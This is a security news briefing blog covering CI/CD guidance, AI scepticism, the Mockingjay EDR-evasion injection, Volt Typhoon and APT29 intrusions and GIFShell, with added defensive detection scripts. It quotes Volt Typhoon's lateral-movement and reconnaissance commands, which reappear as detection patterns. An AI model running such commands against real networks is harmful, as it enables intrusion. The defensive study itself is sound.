Les Bell and Associates Pty Ltd
Site blog
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
CISA & NSA Release Guidance on Defending CI/CD Pipelines
The US Cybersecurity & Infrastructure Security Agency, together with the NSA, has released an information sheet - of 23 pages - on defending the Continuous Integration / Continuous Delivery (CI/CD) environments that form an essential part of DevOps and DevSecOps.
CI/CD sits at the confluence of a number of factors: the switch to cloud environments, deployment of applications using containers and Platform-as-a-Service architectures, and the application of automation and orchestration throughout the software development lifecycle. It provides a largely straight path from the source code repository where developers check in their code, through the build, test and deployment phases right into production.
As threat actors find it harder and harder to compromise production systems, so they have shifted their attention to the earlier steps in the software supply chain, preferring to compromise source code repositories and the other steps in the CI/CD pipeline. After helpfully defining terms - not every security pro has a development background, unfortunately, and those who do often left the field before the advent of DevOps - the 'sheet' moves on to enumerating the threats (based on the OWASP Top 10 CI/CD Security Risks) and the relevant attack surfaces, including:
- Insecure code
- Poisoned pipeline execution
- Insufficient pipeline access controls
- Insecure system configuration
- Usage of third-party services
- Exposure of secrets
This is followed by three interesting scenarios, and then suggested mitigations to harden CI/CD environments, such as:
- Using recommended cryptography
- Minimize the use of long-term credentials
- Signing the CI/CD configuration and verifying it throughout the process
- Requiring a second programmer to review and approve code as part of the check-in process
- Implementing the principle of least privilege for CI/CD access
- Carefully securing secrets, tokens and keys, including ensuring none are left embedded in code
- Proactively patching and updating CI/CD tools and the underlying systems
- Implementing security scanning tools such as static and dynamic testing early in the CI/CD process
- Restricting untrusted libraries and tools
- Quickly removing temporary resources such as VM's and Kubernetes clusters after use
- Implementing software bill of materials (SBOM) and software composition analysis (SCA)
- Architecting, building and testing for resiliency
An appendix maps the various CI/CD threats to the MITRE ATT&CK framework tactics as well as the D3FEND countermeasures. The information sheet also provides many links to additional guidance documents. I'd say this information sheet is required reading for the many information assurance pros whose developers have been tardy in inviting them to the DevOps party. Time to replace that with DevSecOps!
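Two of the mitigations above - keeping secrets, tokens and keys out of code, and minimising long-term credentials - are the easiest to check mechanically in a pipeline. The following is an added example (my own code, not from the NSA/CISA sheet) of a pre-commit style scanner for CI configuration files: it reports well-known long-lived token formats and any credential-looking variable assigned a literal value, while accepting values pulled from a secrets store at run time (anything starting with `$`). The sample configuration, the `ghp_` token and the `corp.example` style names are constructed; the AWS key is Amazon's documented example key.

```python
import re
from dataclasses import dataclass

# Well-known long-lived credential formats. The AWS key in the sample is Amazon's
# documented example key; the GitHub token is a constructed dummy of the right shape.
TOKEN_PATTERNS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github-personal-token": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private-key-block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

# A credential-looking variable assigned a literal value: NAME: value or NAME = value.
ASSIGNMENT = re.compile(
    r"(?i)(?P<name>[A-Z0-9_.-]*(password|passwd|secret|token|api[_-]?key|access[_-]?key)"
    r"[A-Z0-9_.-]*)\s*[:=]\s*['\"]?(?P<value>[^\s'\"]+)"
)


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str
    excerpt: str


def is_runtime_reference(value: str) -> bool:
    """Values injected from a secrets store at run time (${{ secrets.X }}, $VAULT_TOKEN)
    are the pattern the guidance recommends, so they are not reported."""
    return value.startswith("$")


def mask(secret: str) -> str:
    """Keep a short prefix so the finding can be located without copying the secret into a report."""
    return secret[:4] + "*" * (len(secret) - 4)


def scan_config(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for number, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in TOKEN_PATTERNS.items():
            match = pattern.search(line)
            if match:
                findings.append(Finding(number, kind, mask(match.group(0))))
        match = ASSIGNMENT.search(line)
        if match and not is_runtime_reference(match.group("value")):
            findings.append(Finding(number, "literal-credential-assignment", match.group("name")))
    return findings


# Constructed sample pipeline configuration: the build job embeds credentials,
# the deploy job references a secrets store and should pass.
SAMPLE_CONFIG = """\
jobs:
  build:
    env:
      AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
      AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    steps:
      - run: curl -H "Authorization: token ghp_0123456789abcdefghijklmnopqrstuvwxyz" https://api.example.test
  deploy:
    env:
      DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
    steps:
      - run: ./deploy.sh
"""

if __name__ == "__main__":
    for finding in scan_config(SAMPLE_CONFIG):
        print(f"line {finding.line}: {finding.kind} ({finding.excerpt})")
```

Run it over a real pipeline file with `scan_config(open("ci.yml").read())` and fail the job on any finding; the deploy job in the sample shows the shape that passes, a reference resolved by the CI system at run time rather than a literal checked into the repository.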
NSA and CISA, Defending Continuous Integration/Continuous Delivery (CI/CD) Environments, cybersecurity information sheet, June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/28/cisa-and-nsa-release-joint-guidance-defending-continuous-integrationcontinuous-delivery-cicd and https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF.
Second Thoughts About AI?
The AI hype cycle is finally dying down, as more and more stories surface of embarrassing AI disasters such as the one that befell a lawyer who filed a ChatGPT-written document citing non-existent cases. Now, a new survey from Malwarebytes has revealed the initial enthusiasm for ChatGPT has faded, with 81% of respondents concerned about possible security and safety risks, 63% not trusting the information it produces and 51% wanting to see work on it paused while regulations catch up.
If you are familiar with Gartner's hype cycle, you probably agree: we've fallen from the Peak of Inflated Expectations to the Trough of Disillusionment.
As an AI enthusiast from the early 1970's (in the Department of Cybernetics at the University of Reading) I'd say that's unfortunate: the sins of commercial large language models (LLM's) should not be transferred to the many less ambitious and less spectacular applications of machine learning and AI that are making continuous incremental progress. In large part, the inflated expectations were inevitable as the public, who do not understand the internal operation of transformers and generative LLM's, poked and prodded at the beast and were amazed when it produced lucid and articulate responses. Surely something that speaks so fluidly - and at length, too! - must actually be intelligent!
Sorry - no.
When put to work on a bounded and high-quality corpus of training material - for example, a database of legislation and regulations - such programs can do an excellent job of tasks such as summarization and abstraction as well as answering questions which demand only limited inference. I can see them being incredibly useful in GRC applications, for example, where they could spare analysts many hours of boring reading and searching to determine the consequences of various proposed actions.
Where ChatGPT and its ilk fall down is in two areas. Firstly, they train on the public world wide web (as it existed in 2021, in the case of GPT-3). And the web is notoriously full of misinformation, disinformation and outright malinformation. And secondly, being limited purely to statistical processing of words - knowing synonyms, how frequently words appear, how often they appear in various combinations, etc. - and not their meanings, LLM's can't tell fact from fiction, so happily treat the two the same way.
And when processing case law or academic papers, for example, the LLM's record things like the types of names that appear in case titles (some companies, some individuals, etc.) and the styles of paper titles, author names and their related institutions, reference styles, etc. When spinning words around to create output, they will quite happily pick relevant words and spin them into plausible-sounding cases and papers - a process referred to as AI hallucination.
This process is likely to get worse, as the use of generative LLM's by news aggregation sites, and especially disinformation sites, rapidly increases on the web. As other LLM's train on this data, so a feedback loop will develop in which AI trains on AI-generated text. Can you spell, garbage in, garbage out?
A recent paper by Shumailov et al. (with Ross Anderson, of "Security Engineering" fame, as one of the co-authors) addresses this very topic, finding that "model-generated content in training causes irreversible defects in the resulting models, where tails of the original content distribution disappear. We refer to this effect as Model Collapse and show that it can occur in Variational Autoencoders, Gaussian Mixture Models and LLMs. We build theoretical intuition behind the phenomenon and portray its ubiquity amongst all learned generative models".
In short, LLM's have their place, and as long as they stay in it and aren't unleashed to roam the world wide web, they are going to perform valuable work, including in security-related areas such as compliance assurance, software development (essentially a transformation problem from problem specification to executable code), automated malware analysis (explicating what machine code does and is likely intended to achieve), etc. But let's keep our expectations in check, mmmkay?
Shumailov, Ilia, The Curse of Recursion: Training on Generated Data Makes Models Forget, arXiv preprint, 31 May 2023. Available online at https://arxiv.org/abs/2305.17493v2.
Stockley, Mark, 81% concerned about ChatGPT security and safety risks, Malwarebytes survey shows, blog post, 27 June 2023. Available online at https://www.malwarebytes.com/blog/news/2023/06/chatgpt.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
New Process Injection Technique Can Bypass Detection by EDR Products
An increasingly common technique used by malware authors to evade detection is process injection. This replaces the code of an existing, trusted system process with malicious code, injected by the attacker. Because the code is executing within the context of a trusted process, it will be hard for security tools to detect it, and in some cases the technique allows completely file-less exploitation, leaving behind no artifacts on the victim's disk to be examined by malware analysts.
A new process injection technique developed by researchers at Israeli security firm Security Joes is able to evade detection by endpoint detection and response (EDR) applications. The new technique, which its developers call "Mockingjay", does not use Windows API calls such as VirtualAlloc(), VirtualAllocEx(), WriteProcessMemory() and others, which EDR applications typically hook as a means of detecting and blocking their use.
Instead, their new technique leverages a vulnerable dynamic link library - one which possesses a default Read/Write/Execute (RWX) memory section, which can then be abused to inject the desired code. Since the DLL already has RWX memory, this eliminates the need to make calls to memory allocation API's or NtWriteVirtualMemory() and NtProtectVirtualMemory(), which are also closely monitored by EDR software.
The researchers wrote a tool to search the entire Windows filesystem for such a DLL, and found one: msys-2.0.dll, which is part of Visual Studio 2022 Community Edition. This DLL has 16 KB of RWX memory available - an ideal space for code injection and execution.
The next step was to find a method that could leverage this without making the monitored API calls. Their first approach is to load the vulnerable DLL directly and then find the RWX memory area, using the LoadLibraryW() and GetModuleInformation() system calls. In a proof-of-concept, this was then used to run code, based on the Hell's Gate technique, to create a system call stub and then jump directly into system API's in order to unhook the EDR hooks and allow further activity without observation.
A second approach is to perform process injection on a remote process, again relying on the RWX memory section in msys-2.0.dll. It turns out that this DLL is commonly used by applications that require POSIX emulation, such as GNU utilities, some of which are found in Visual Studio 2022 Community Edition. For their proof-of-concept, the researchers successfully injected code into the ssh.exe (Secure Shell) process, causing it to load yet another DLL which created a reverse shell to a remote machine. The only limitation of this technique is that the targeted DLL (in this case msys-2.0.dll) cannot use Address Space Layout Randomization (ASLR), as this would require dynamic resolution of the address of the RWX memory section.
The Security Joes blog article contains a detailed write-up which is effectively a well-written tutorial on process injection techniques. It also provides some recommendations on detection techniques.
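The precondition for the whole technique is a module shipped with a section that is readable, writable and executable at once, and that property is declared in the PE section table rather than hidden. Below is an added example (my own code, not Security Joes' tool) of a defensive inventory check: a parser for the PE section table that flags RWX sections, so that a defender can audit their own software estate, confirm a vendor's build settings, and put any module carrying such a section on an EDR watchlist. The PE layout constants are from the PE/COFF specification; `build_test_image` assembles a constructed header-only image purely so the parser can be exercised offline, and the section layout it uses is invented.

```python
import struct
from dataclasses import dataclass
from pathlib import Path

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    characteristics: int

    @property
    def is_rwx(self) -> bool:
        return self.characteristics & RWX == RWX


def parse_sections(image: bytes) -> list[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    # NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    number_of_sections, size_of_optional_header = struct.unpack_from("<H12xH", image, coff + 2)
    offset = coff + 20 + size_of_optional_header
    sections = []
    for _ in range(number_of_sections):
        # IMAGE_SECTION_HEADER: Name(8) VirtualSize VirtualAddress SizeOfRawData PointerToRawData
        # PointerToRelocations PointerToLinenumbers NumberOfRelocations NumberOfLinenumbers Characteristics
        name, virtual_size, virtual_address, *_, characteristics = struct.unpack_from("<8sIIIIIIHHI", image, offset)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                virtual_address, virtual_size, characteristics))
        offset += 40
    return sections


def rwx_sections(image: bytes) -> list[Section]:
    return [s for s in parse_sections(image) if s.is_rwx]


def audit_file(path: str) -> list[Section]:
    """Sections of an on-disk DLL or EXE that are mapped read/write/execute."""
    return rwx_sections(Path(path).read_bytes())


def build_test_image(layout) -> bytes:
    """Constructed PE32+ skeleton (DOS stub, PE signature, COFF header, zeroed optional header,
    section table) with the given sections. It is not loadable; it only exercises the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE signature directly after the DOS header
    optional_header = bytes(240)                   # PE32+ optional header size
    coff = struct.pack("<HHIIIHH", 0x8664, len(layout), 0, 0, 0, len(optional_header), 0x2022)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), size, rva, size, 0, 0, 0, 0, 0, flags)
        for name, rva, size, flags in layout
    )
    return bytes(dos) + b"PE\0\0" + coff + optional_header + table


# Invented layout: a normal code section, a normal data section, and one RWX section.
SAMPLE_LAYOUT = [
    (".text", 0x1000, 0x8000, 0x60000020),   # CODE | EXECUTE | READ
    (".data", 0x9000, 0x2000, 0xC0000040),   # INITIALIZED_DATA | READ | WRITE
    (".rwx", 0xB000, 0x4000, 0xE0000040),    # INITIALIZED_DATA | EXECUTE | READ | WRITE
]

if __name__ == "__main__":
    for section in rwx_sections(build_test_image(SAMPLE_LAYOUT)):
        print(f"RWX section {section.name} at RVA {section.virtual_address:#x}, {section.virtual_size} bytes")
```

Pointed at a directory of DLLs (`audit_file` on each), this produces the list of modules an EDR should treat as sensitive: a section that is already executable and writable means later code placement in it will not pass through the memory-protection APIs the story says are hooked, so the loaded module itself is the thing to watch.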
Peixoto, Thiago, Felipe Duarte and Ido Naor, Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution, blog post, 27 June 2023. Available online at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
Europol Investigation Leads to 6,558 Arrests
Back in 2020, French and Dutch police forces were able to infiltrate the operations of EncroChat, an encrypted mobile messaging service that offered its users - mainly criminals - hardened Android phones with just the features they needed: strong encryption, rapid device erasure with a specific PIN or remote deletion by the EncroChat help desk and a tamper-proof boot process. Despite the high price of both the device and its subscription service, EncroChat sold like hot cakes, with tens of thousands of users world wide.
The Joint Investigation Team established by the French and Dutch authorities with assistance from Eurojust and Europol was able to intercept, share and analyse over 115 million criminal conversations, by over 60,000 users. Based on the accumulated statistics from the many countries who used the shared data over the next three years, the results are:
- 6,558 suspects arrested, including 197 High Value Targets
- 7,134 years of imprisonment of convicted criminals up to now
- €739.7 million in cash seized
- €154.1 million frozen in assets or bank accounts
- 30.5 million drug pills seized
- 103.5 tonnes of cocaine seized
- 163.4 tonnes of cannabis seized
- 3.3 tonnes of heroin seized
- 971 vehicles seized
- 271 estates or homes seized
- 923 weapons seized, as well as 21,750 rounds of ammunition and 68 explosives
- 83 boats and 40 planes seized
The investigation, conducted at Europol's headquarters under the name "Operational Task Force EMMA", also prevented violent attacks, attempted murders, large-scale drug importations and corruption. And while many of EncroChat's customers fled to another service called SkyECC, this was also penetrated and dismantled in 2021.
All in all, an impressive result.
Europol, Dismantling encrypted criminal EncroChat communications leads to over 6 500 arrests and close to EUR 900 million seized, news release, 27 June 2023. Available online at https://www.europol.europa.eu/media-press/newsroom/news/dismantling-encrypted-criminal-encrochat-communications-leads-to-over-6-500-arrests-and-close-to-eur-900-million-seized.
Chinese APT Targets Critical Infrastructure, OT
Researchers at managed security provider Crowdstrike have released details of an incident involving a Chinese-nexus threat actor which they track as VANGUARD PANDA (also known as Volt Typhoon). The cyber-espionage group consistently targets Zoho ManageEngine ADSelfService Plus in order to obtain initial access, after which they deploy webshells and make use of living-off-the-land techniques to avoid leaving behind detectable artifacts which could be used as IOC's.
In this particular incident, Crowdstrike's Falcon Complete managed-detection-and-response was triggered by suspicious reconnaissance commands - such as listing processes, testing network connectivity, gathering user and group information, and using WMI to enumerate domain trust and DNS zones - executed under an Apache Tomcat web application server running ManageEngine ADSelfService Plus. The use of these commands indicated a familiarity with the target environment, as the commands were executed rapidly and used specific internal hostnames and passwords:
cmd /C "tasklist /svc"
cmd /C "ping -n 1 [redacted]"
cmd /C "ping -n 1 -a [redacted]"
cmd /C "net group "domain controllers" /dom"
cmd /C "net use \\[redacted]\admin$ REDACTED /u:[redacted]"
cmd /C "dir \\[redacted]\c$\Users"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c nltest /DOMAIN_TRUSTS >>C:\Users\[redacted]\AppData\Local\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c Dnscmd . /EnumZones >>C:\Users\[redacted]\AppData\Local\Temp\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
At this point the Crowdstrike team quickly quarantined and triaged the host, notifying the impacted customer while analysing the Apache Tomcat access logs. This revealed multiple POST requests to the file /html/promotion/selfsdp.jspx which, upon analysis, turned out to be a webshell capable of running arbitrary commands by using the /C option of the classic Windows shell, cmd.exe and the ProcessBuilder class. It also attempted to masquerade as part of ManageEngine ADSelfService Plus, using that as its page title and adding legitimate links to help desk software. In fact, selfsdp.jspx will match the EncryptJSP YARA rule provided in a May CISA advisory on Volt Typhoon.
However, a lot of red flags remained: for example, the use of hostnames above indicated a lot of prior reconnaissance and enumeration and the inclusion of passwords indicated that admin accounts had already been compromised - likely before the Falcon Complete sensor had been installed. In fact, the selfsdp.jspx webshell had been written to disk almost six months before the Falcon sensor was installed, and examination of the Apache Tomcat logs correlated its installation with an HTTP POST request to /html/error.jsp - but that file no longer existed, indicating its deletion in an attempt to evade detection and analysis. A lot of related log entries had also vanished - on one day, the entire first 12 hours of the access log had gone.
To cut a long story short - Crowdstrike's blog article provides the full details - the threat actor eventually slipped up. .jsp and .jspx pages - Java Server Pages - contain scriptlets of Java code which are extracted to create .java Java source code files and then compiled into the corresponding .class bytecode files for execution. This is done by a component of Apache Tomcat - the Jasper 2 JSP engine - which places the .java and .class files in a separate directory structure, and while the intruder cleaned up the log files and other artifacts, they missed these.
One of them, ListName_jsp.java, in turn deployed a backdoored version of the tomcat-websocket.jar Apache Tomcat library incorporating a webshell. This was then timestamped to match the timestamp on the original tomcat-websocket.jar file so that it would appear not to have been replaced (although obviously a filesystem verification program would detect its changed digest value).
The Crowdstrike blog article makes fascinating reading and includes some recommendations for detection and mitigation of this attack, which is just one of many the firm has seen against US-based critical infrastructure.
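The two lessons of this story are both detection lessons: a web application server spawning a burst of discovery commands is the signal that fired, and the compiled artifacts Jasper leaves behind are the evidence that survived the clean-up. The following is an added example (my own code, not Crowdstrike's detection logic) of both checks in one script: `detect_bursts` runs over process-creation events and alerts when one Tomcat/Java parent spawns several distinct reconnaissance techniques within a window, and `orphaned_compiled_jsps` lists compiled JSP sources in a Tomcat work directory whose page no longer exists in the webapp. The events, host names, account names and file names are constructed to mirror the command sequence above; the Jasper naming rule (`<name>_jsp.java`, `<name>_jspx.java`) is as I understand it, with a flat layout assumed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class ProcessEvent:
    ts: datetime
    host: str
    parent_pid: int
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


# Discovery commands from the intrusion, matched against the child command line.
RECON_PATTERNS = {
    "process-listing": re.compile(r"\btasklist\b", re.I),
    "connectivity-test": re.compile(r"\bping\b", re.I),
    "domain-group-enum": re.compile(r"\bnet\s+group\b", re.I),
    "admin-share-access": re.compile(r"\\\\[^\s\\]+\\(admin\$|c\$)", re.I),
    "remote-wmi-exec": re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I),
    "domain-trust-enum": re.compile(r"\bnltest\b.*/DOMAIN_TRUSTS", re.I),
    "dns-zone-enum": re.compile(r"\bdnscmd\b.*/EnumZones", re.I),
}
# Parent processes that have no business spawning discovery commands.
WEB_SERVER_PARENT = re.compile(r"tomcat|catalina|java\.exe|w3wp\.exe|httpd", re.I)


def classify(event: ProcessEvent) -> list[str]:
    """Recon techniques matched by a cmd.exe child of a web application server; [] otherwise."""
    if event.image.lower() != "cmd.exe":
        return []
    if not WEB_SERVER_PARENT.search(event.parent_image + " " + event.parent_cmdline):
        return []
    return [name for name, pattern in RECON_PATTERNS.items() if pattern.search(event.cmdline)]


@dataclass(frozen=True)
class Alert:
    host: str
    parent_pid: int
    first: datetime
    last: datetime
    techniques: tuple


def detect_bursts(events, min_techniques=3, window=timedelta(minutes=10)) -> list[Alert]:
    """Alert when one web-server parent spawns several distinct recon techniques within `window`."""
    hits = defaultdict(list)
    for event in sorted(events, key=lambda e: e.ts):
        techniques = classify(event)
        if techniques:
            hits[(event.host, event.parent_pid)].append((event, techniques))
    alerts = []
    for (host, parent_pid), group in hits.items():
        chunk = []
        for item in group + [None]:  # the trailing None flushes the last chunk
            if item is not None and (not chunk or item[0].ts - chunk[0][0].ts <= window):
                chunk.append(item)
                continue
            seen = sorted({t for _, techs in chunk for t in techs})
            if len(seen) >= min_techniques:
                alerts.append(Alert(host, parent_pid, chunk[0][0].ts, chunk[-1][0].ts, tuple(seen)))
            chunk = [item] if item is not None else []
    return alerts


JASPER_NAME = re.compile(r"^(?P<stem>.+)_(?P<ext>jsp|jspx)\.java$")


def orphaned_compiled_jsps(work_dir_java_files, webapp_files) -> list[str]:
    """Compiled JSP sources in Tomcat's work directory with no matching .jsp/.jspx left in the
    webapp: a page that was compiled, served and then deleted. Assumes a flat layout."""
    present = {f.lower() for f in webapp_files}
    orphans = []
    for name in work_dir_java_files:
        m = JASPER_NAME.match(name)
        if m and f"{m['stem']}.{m['ext']}".lower() not in present:
            orphans.append(name)
    return orphans


# Constructed parent command line for a Tomcat-hosted ManageEngine instance.
TOMCAT = r'"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe" -Dcatalina.base="C:\ManageEngine\ADSelfService Plus"'


def _ev(minute, parent_image, parent_cmd, cmdline, host="web01", ppid=4120):
    return ProcessEvent(datetime(2023, 6, 1, 9, minute), host, ppid, parent_image, parent_cmd, "cmd.exe", cmdline)


# Constructed events modelled on the command sequence above; hosts, accounts and secrets are placeholders.
SAMPLE_EVENTS = [
    _ev(0, "java.exe", TOMCAT, 'cmd /C "tasklist /svc"'),
    _ev(0, "java.exe", TOMCAT, 'cmd /C "ping -n 1 dc01.corp.example"'),
    _ev(1, "java.exe", TOMCAT, 'cmd /C "net group "domain controllers" /dom"'),
    _ev(1, "java.exe", TOMCAT, r'cmd /C "net use \\dc01\admin$ [redacted] /u:corp\svc_admin"'),
    _ev(2, "java.exe", TOMCAT, r'cmd /C "wmic /node:dc01 /user:corp\svc_admin /password:[redacted] process call create "cmd /c nltest /DOMAIN_TRUSTS >>C:\Users\svc_admin\AppData\Local\Temp\out.tmp""'),
    _ev(3, "java.exe", TOMCAT, r'cmd /C "wmic /node:dc01 /user:corp\svc_admin /password:[redacted] process call create "cmd /c Dnscmd . /EnumZones >>C:\Users\svc_admin\AppData\Local\Temp\out.tmp""'),
    _ev(5, "explorer.exe", "explorer.exe", 'cmd /C "ping -n 1 printserver"', host="ws42", ppid=880),
    _ev(6, "java.exe", TOMCAT, r'cmd /C "dir C:\ManageEngine\logs"'),
]

if __name__ == "__main__":
    for alert in detect_bursts(SAMPLE_EVENTS):
        print(alert)
```

Note that the explorer.exe-spawned ping on the workstation and the harmless `dir` from the same Java parent are both ignored: the rule keys on the parent being a web server and on the variety of discovery techniques, not on any single command, which is what separates an interactive intruder from a legitimate maintenance script.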
CISA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, cybersecurity advisory AA23-144a, 24 May 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a.
Falcon Complete Team, Business as Usual: Falcon Complete MDR Thwarts Novel VANGUARD PANDA (Volt Typhoon) Tradecraft, blog post, 22 June 2023. Available online at https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/.
Cozy Bear At It Again
In a series of tweets, Microsoft Threat Intelligence has reported a rise in credential attack activity by the Russian state-sponsored APT29, a.k.a. Cozy Bear and NOBELIUM, which the Redmondites track as Midnight Blizzard (I wish they would stick to bears and pandas - it makes life a lot easier!). The attacks target governments, IT service providers, NGO's, defense contractors and critical manufacturing, using a variety of password spray, brute force and token theft techniques, as well as session replay attacks using stolen session credentials likely acquired via illicit sale in dark web markets or Telegram channels.
In this campaign the threat actor is using residential proxy services to hide the real source of their attacks. Residential proxies are low-cost or free proxies provided by a variety of service providers - I have even seen home users being invited to install proxy servers under the pretext that it will get them additional bandwidth (it won't) or in return for a small income. The problem is that the main purpose of such proxies is to disguise the source of online activities for a variety of dodgy or disreputable activities (which means that home users who naively install them are likely to see their IP addresses blacklisted), although they do have a few legitimate uses, especially in states which restrict their citizens' access to information.
APT29's use of residential proxies for a brief period before moving on also makes it harder for defenders to distinguish these attacks from legitimate traffic and block them.
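The practical consequence of the residential-proxy point is that a per-source-address rule sees nothing: a password spray spread across thousands of home IP addresses never trips a "N failures from one IP" threshold. The following is an added example (my own code, not Microsoft's detection logic) that puts a classic per-source rule beside a tenant-wide rule keyed on the number of distinct accounts failing inside a short window, the shape that does fire on a spray. The sign-in log is constructed, using documentation-range addresses and `corp.example` account names.

```python
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SignIn:
    ts: datetime
    user: str
    src_ip: str
    success: bool


def make_sample_log() -> list[SignIn]:
    """Constructed log: one guess per account from a different address each time (the spray),
    followed later in the morning by a few ordinary mistyped passwords."""
    start = datetime(2023, 6, 22, 3, 0)
    spray = [SignIn(start + timedelta(seconds=20 * i), f"user{i:02d}@corp.example", f"203.0.113.{i + 1}", False)
             for i in range(30)]
    noise = [
        SignIn(start + timedelta(hours=2), "alice@corp.example", "198.51.100.7", False),
        SignIn(start + timedelta(hours=2, minutes=1), "alice@corp.example", "198.51.100.7", True),
        SignIn(start + timedelta(hours=2, minutes=40), "bob@corp.example", "198.51.100.9", False),
        SignIn(start + timedelta(hours=3, minutes=5), "carol@corp.example", "198.51.100.12", False),
    ]
    return spray + noise


def per_source_rule(events, threshold: int = 5) -> set[str]:
    """Classic brute-force rule: many failures from one address. Rotating proxies defeat it."""
    failures = Counter(e.src_ip for e in events if not e.success)
    return {ip for ip, n in failures.items() if n >= threshold}


@dataclass(frozen=True)
class SpraySignal:
    start: datetime
    end: datetime
    users: int
    source_ips: int
    max_failures_per_user: int


def spray_rule(events, window: timedelta = timedelta(minutes=15), min_users: int = 20) -> list[SpraySignal]:
    """Tenant-wide rule: many distinct accounts failing within `window`, regardless of source.
    Each signal also reports how many sources were involved and the worst per-user count, so an
    analyst can tell a low-and-slow spray (many sources, one or two guesses each) from an outage."""
    failures = sorted((e for e in events if not e.success), key=lambda e: e.ts)
    signals, i = [], 0
    while i < len(failures):
        j = i
        while j < len(failures) and failures[j].ts - failures[i].ts <= window:
            j += 1
        chunk = failures[i:j]
        per_user = Counter(e.user for e in chunk)
        if len(per_user) >= min_users:
            signals.append(SpraySignal(chunk[0].ts, chunk[-1].ts, len(per_user),
                                       len({e.src_ip for e in chunk}), max(per_user.values())))
            i = j          # consume the window and continue after it
        else:
            i += 1
    return signals


if __name__ == "__main__":
    log = make_sample_log()
    print("per-source rule:", per_source_rule(log) or "nothing")
    for signal in spray_rule(log):
        print("spray signal:", signal)
```

On the sample the per-source rule returns nothing, while the tenant-wide rule reports thirty accounts from thirty sources with one failure each in under ten minutes. Tune `min_users` to the size of the tenant; the complementary control, as the thread suggests, is to make a correct password insufficient on its own, so that a spray that guesses right still fails at the second factor.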
Microsoft Threat Intelligence, "Microsoft has detected increased credential attack activity...", Twitter thread, 22 June 2023. Available online at https://twitter.com/MsftSecIntel/status/1671579358031486991.
GIFShell Attack Exploits Teams; Exfiltrates Data Through MS Servers
A new exfiltration technique allows attackers who compromise Microsoft Teams users to exfiltrate data through Microsoft's own servers, making the exfiltration hard to spot by endpoint security products and firewalls, since it looks like legitimate Teams traffic.
The technique, named GIFShell, uses a reverse shell that delivers malicious commands via base64 encoded GIF files in Teams, and exfiltrates the output, also as GIF's, via the Teams infrastructure. The attacker must first somehow convince a user to install a malicious backdoor that executes commands and uploads the results via a GIF URL to a Teams webhook. The backdoor scans the Teams logs for messages with a GIF, extracts the base64 encoded commands and executes them, converting the output to base64 text which is used as the filename for a remote GIF embedded in a Microsoft Teams Survey card that is submitted to the attacker's public webhook.
Microsoft has acknowledged the GIFShell attack, but will not issue a fix, stating that no security boundaries were bypassed, this being a post-exploitation technique.
